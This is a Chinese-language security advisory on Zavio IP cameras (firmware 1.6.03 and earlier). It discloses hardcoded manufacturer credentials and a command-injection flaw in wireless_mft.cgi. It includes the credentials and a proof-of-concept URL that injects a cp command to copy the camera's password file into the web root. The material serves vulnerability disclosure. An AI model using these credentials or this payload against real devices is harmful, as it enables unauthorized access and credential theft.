发布日期:2013-05-28
更新日期:2013-05-29受影响系统:
Zavio Zavio IP Cameras <= 1.6.03
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 60190
CVE(CAN) ID: CVE-2013-2568
Zavio IP Cameras是网络摄像机产品。
Zavio IP Cameras在文件"/cgi-bin/mft/wireless_mft.cgi"的参数"ap"中存在OS命令注入,通过硬编码凭证可导致OS命令注入。
<*来源:Nahuel Riva
Francisco Falcon
链接:http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/89865?page=last
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
摘录自
http://www.coresecurity.com/advisories/zavio-IP-cameras-multiple-vulnerabilities
[CVE-2013-2567] 硬编码的可访问管理界面的用户名和密码
配置文件"boa.conf"中含有硬编码的用户名和密码,可通过该用户名和密码访问"/cgi-bin/mft/"的CGI文件("manufacture.cgi"和"wireless_mft.cgi")。
其中"wireless_mft.cgi"包含一个命令注入漏洞(CVE-2013-2568)
/-----
# MFT: Specify manufacture commands user name and password
MFT manufacture erutcafunam
-----/
[CVE-2013-2568] 命令注入漏洞
"/cgi-bin/mft/wireless_mft.cgi"对"ap"参数验证不严而导致命令注入漏洞。
下面poc演示如何获取用户的凭证信息
step1. 使用前述硬编码的用户名(manufacture)和密码(erutcafunam)访问"/cgi-bin/mft/wireless_mft.cgi";
stpe2. 构造恶意"ap"参数值来执行cp命令,拷贝私密文件;
step3. 访问私密文件.
step2.
/-----
http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales
-----/step3.
Afterwards, the user credentials can be obtained by requesting:
/-----
http://192.168.1.100/credenciales
-----/建议:
--------------------------------------------------------------------------------
厂商补丁:
Zavio
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.zavio.com/ModSecurity 的拒绝服务漏洞已修复Apache Tomcat DIGEST Authentication重放攻击漏洞(CVE-2013-2051)相关资讯 Zavio IP Cameras 本文评论 查看全部评论 (0)
评论声明尊重网上道德,遵守中华人民共和国的各项有关法律法规 承担一切因您的行为而直接或间接导致的民事或刑事法律责任 本站管理人员有权保留或删除其管辖留言中的任意内容
收藏该网址